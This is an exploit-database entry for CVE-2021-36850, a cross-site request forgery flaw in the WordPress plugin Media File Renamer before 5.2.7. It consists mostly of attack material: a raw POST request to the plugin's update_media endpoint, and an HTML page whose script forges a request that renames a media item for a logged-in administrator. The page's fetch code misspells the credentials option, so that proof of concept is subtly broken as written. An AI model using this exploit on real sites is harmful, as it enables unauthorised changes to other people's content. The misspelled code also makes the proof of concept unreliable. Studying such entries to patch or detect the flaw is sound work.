Exploit for Media File Renamer - Auto & Manual Rename < 5.2.7 - Media Title/Filename/Locking State Update via CSRF CVE-2021-36850

Name: Exploit for Media File Renamer - Auto & Manual Rename < 5.2.7 - Media Title/Filename/Locking State Update via CSRF CVE-2021-36850
Rating: 5 (275 reviews)

2021-09-04 | CVSS 4.3

## https://sploitus.com/exploit?id=WPEX-ID:BF05DF66-0F5C-4124-A0C7-4DB42D13F944
POST /wp-json/media-file-renamer/v1/update_media HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 47
Connection: close
Cookie: [admin via CSRF]

{"post_title":"Updated via CSRF","id":"2055"}


This won't work as the CORS prevent cookies from being included in the request

<html>
  <head>
    <script>
      fetch(
        'https://example.com/wp-json/media-file-renamer/v1/update_media',
        {
          method: 'POST',
          credentails: 'include',
          body: JSON.stringify({"post_title": "Changed via CSRF", "id": 2055}),
          headers: {'Content-Type': 'application/json'}
        }
      );
    </script>
  </head>
</html>